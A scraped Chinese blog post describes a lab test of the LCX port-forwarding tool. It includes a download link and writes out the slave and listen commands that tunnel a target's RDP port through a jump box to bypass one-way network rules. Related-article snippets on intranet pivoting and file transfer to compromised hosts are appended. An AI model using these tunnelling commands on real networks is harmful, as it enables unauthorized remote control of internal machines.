Lcx端口转发初探

article/2025/8/24 5:27:45

最近写了一个简单的威胁分析专家系统Gui图形界面工具,可以快速判断失陷主机,给出失陷隶属度,非常人性化,压缩包大小有20M。实际上,这个小工具可以帮助一线驻场人员,快速定位高危主机,并给所有主机进行威胁排名,指导现场进行威胁处置。采用多维度的打分算法,是整个系统的关键,也花了一点时间来调参。看着自己的小工具,还是蛮有成就感的,我准备明年写一点小游戏,这样大家都能体验我的开发成果~


实际上关于Lcx的文章非常多,但是却没有一个人告诉你Lcx在哪里下载,为什么呢?因为Lcx腾讯管家等主流杀毒软件会报告是病毒,虽然这个误报,但是主流厂商都报,后来者只好跟着报了,Lcx就是为了端口转发的。通过Lcx可以解决数据流的单边问题,比如公司内网可以访问外网,但是外网不可以访问内网,通过Lcx就可以实现从外网访问内网,打破单边网络实现对内网的控制。

Lcx的Github下载地址如下,实际上网上有很多不同版本,但是Github上的是最安全的。

https://github.com/UndefinedIdentifier/LCX

步骤一:在目标机器上执行反射操作,反射到跳板机

Lcx.exe -slave 192.168.160.139 4444 127.0.0.1 3389

91ab9e198e3c717947604be7d61e85dc.png

步骤二:在跳板机上接收,即将3389端口映射成5555端口

Lcx.exe -listen 4444 5555

d6bc3c0ddff1374929037d97000459a5.png

步骤三:在跳板机上通过5555端口建立到目标机器上的远程连接

a1540f56f645e9114769246fba65a32e.png

步骤四:见证奇迹,真的不容易,进程不稳定

  • 终于成功啦~
  • 多了一个用户登陆了(AILX00-Win7\ailx00)
  • 图中的第三个就是啦~

5ac1806289af42ea9635433d1691c526.png
  • 远程登陆到非域账号的ailx00账户~
  • 桌面干干净净的啥也没有~

789ac041947499b8526a099a1c20281a.png

有的人感觉很简单,实际上看起来简单,实战的时候,就会感觉时间流逝的飞快。其中冷暖,实验自知,我大概经历了10多次的失败尝试,终于爽了一把,转眼一看,已经12点半了,还好是周末,赶紧睡觉,身体要紧~

  • 登陆域账号的时候,各种出错

e7650ecad63105e7c5630464b133eb8e.png
  • 登陆非域账号的时候,出现这个是正常的,也预示着实验的成功

4550af6e2f3d004086bacf9e152b4233.png
  • 由于我的靶机的远程没有开放,导致没有成功
  • 在计算机属性里面配置一下,允许远程连接
  • 虽然这个操作较不安全,但是作为试验演示是一个很不错的方法

3dfcfde065bd82fc82979d74bc6cd084.png
  • 由于刚刚开始不知道里面有一个ailx00非域账号,所以添加了一个新的用户ailx0001
  • 因为不是域账号,所以登陆的时候,需要使用计算机名代替域名
  • 这里需要注意一样,很容易搞错

805e6968e5a4fd5374a6d32658922265.png
  • 爽了一把之后
  • 当我再次准备实验的时候
  • 发现在目标机器上的Lcx已经被删除了
  • 是腾讯干的
  • 就算我关闭了腾讯电脑管家
  • 它还是悄悄的把我文件删了
  • 腾讯其实偷偷在内核态运行

本篇完。


http://chatgpt.dhexx.cn/article/LNJqR906.shtml

相关文章

隐藏隧道通信:lcx 端口转发

郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 隐藏隧道通信…

lcx端口转发linux_技术干货 | 内网渗透之代理转发

1 前言 谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。 那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是…

lcx用法

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下: lcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran) 1、lcx 内网…

lcx端口转发

lcx端口转发: 本文主要通过讲解lcx的本地端口及远程端口转发,让能熟练使用lcx端口转发工具,对端口转发知识有更加深入了解,本次实验靶场来源于暗月(moonsec)师傅,本文内容全由本人通过学习理解编制,文中若有错处&…

LCX端⼝转发

LCX是一款十分经典的内网端口转发工具,基于Socket套接字,具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库,在实际利用的时候需要自行做免杀处理。 lcx有三个功能: 第一个功能将本地端口转发到本地另一个端口…

网络安全——lcx的使用

lcx程序可以作远程连接,入侵靶机 下面用win7系统和2003系统作对象 1、 Win7系统作攻击机(IP:192.168.184.134) 2003系统作靶机(被攻击的对象)(IP:192.168.184.101) …

lcx使用方法

lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。 所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉…

端口转发之 lcx

lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下: lcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran) 1、lcx 内网…

远程桌面连接:使用lcx进行端口转发

一、lcx介绍 lcx是一个基于Socket套接字实现的端口转发工具,有Linux和Windows两个版本。比如说,当目标机器开放了3389端口,我们可以将目标机器的3389端口转发到我们自己的外网主机上的某个端口,然后我们在本地机访问外网主机的端…

从服务器下载文件到本地

今天在公司服务器下了一个很大的数据文件(8G),想拉到本地。 环境 本地是Windows,服务器Linux。笔记本刚格式化了,所以碰到了一些之前没有的问题。 过程 1.首先尝试直接winR,输入cmd回车,打开命令行&…

从服务器中下载文件

从服务器中下载文件 本篇博客主要是实现从云服务器中的Linux系统中通过指令下载文件,其具体如下 1、tar -cvzf 压缩包名.tar.gz 文件或文件夹 1.1 指令解释 tar 对多个文件或文件夹进行打包/解包,并且可以进行压缩/解压缩-c 打包; -x 解…

linux上传下载文件

上传下载文件 背景: 通常,我们需要上传本地文件到服务器,或者从服务器下载文件到本地。 一般来说,方法多种多样。我们可以通过SCRT提供的一个辅助工具来进行 下载辅助工具 yum -y install lrzsz命令行 sz # 从服务器下载某文件到…

文件 - 04 下载文件: 根据文件下载链接下载文件

文章目录 1. 根据下载链接下载文件2. 根据下载链接下载文件1. 根据token获取存放在redis中的fileId2. 根据fileId获得文件信息3. 确定用户拥有操作这个fileId的权限4. 获取文件在服务器的存储路径5. 如果用户指定了下载时的文件名则处理文件名6. 验证文件路径是否存在7. 下载文…

文件上传、下载

在Web应用系统开发中,文件上传和下载功能是非常常用的功能,今天来讲一下JavaWeb中的文件上传和下载功能的实现。 对于文件上传,浏览器在上传的过程中是将文件以流的形式提交到服务器端的,如果直接使用Servlet获取上传文件的输入流…

文件下载相关

下载文件的时候,返回报文里缺失响应码,原因:报文头在报文体前面,报文体一旦确定,响应头信息就不能被修改或添加了,但是如果文件流字节数小于等于8192*2的话,文件流内容会被默认加载在缓存中&…

Linux 如何从网上下载文件

镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 将网络上的文件下载到使用 Linux 操作系统的计算机上,需要用到 wget 指令,使用该指令可能会面临两个问题。 首先,如何获取文件的下载 url?这需要你在浏览器上找到要下载文…

github怎么下载文件

在浏览器上打开github主站,点击搜索框。输入关键字搜索自己需要的代码文件,搜索到后点击打开文件库的主分支。 点击右边的code按钮。点击下拉菜单的下载按钮就可以下载文件了。

前端下载文件的几种方式

一、a标签download下载 后端返回一个可下载的url文件,或者前端本地保存的文件,通过路径引入下载。 (1)将资源放入前端本地保存,打包后随一起上传自服务器 // 本地资源下载,引入路径即可,这里的路径指的是…

这里有11种方法,供你用Python下载文件

今天我们一起学习如何使用不同的Python模块从web下载文件。此外,你将下载常规文件、web页面、Amazon S3和其他资源。 最后,你将学习如何克服可能遇到的各种挑战,例如下载重定向的文件、下载大型文件、完成一个多线程下载以及其他策略。 1、使…

15种下载文件的方法

转载:https://blog.netspi.com/15-ways-to-download-a-file/ 瑞恩甘德鲁德 原创时间:2014年6月16日 Pentesters经常将文件上传到受感染的盒子以帮助进行权限提升,或者保持在计算机上的存在。本博客将介绍将文件从您的计算机移动到受感染系统的…